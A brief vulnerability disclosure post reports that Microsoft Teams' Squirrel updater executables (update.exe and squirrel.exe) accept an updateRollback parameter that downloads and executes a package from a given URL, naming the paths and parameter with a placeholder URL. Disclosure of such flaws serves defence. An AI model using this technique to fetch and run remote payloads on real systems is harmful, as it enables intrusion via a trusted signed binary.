Found another vulnerable parameter where Microsoft Teams do remote download and execute payload.
Vulnerable parameter :
%localappdata%/Microsoft/Teams/update.exe — updateRollback=[URL to package]
%localappdata%/Microsoft/Teams/current/squirrel.exe — updateRollback=[URL to package]
Note : It is affecting wide usage of squirrel packages, Hope Microsoft Teams will be fixed as soon as possible.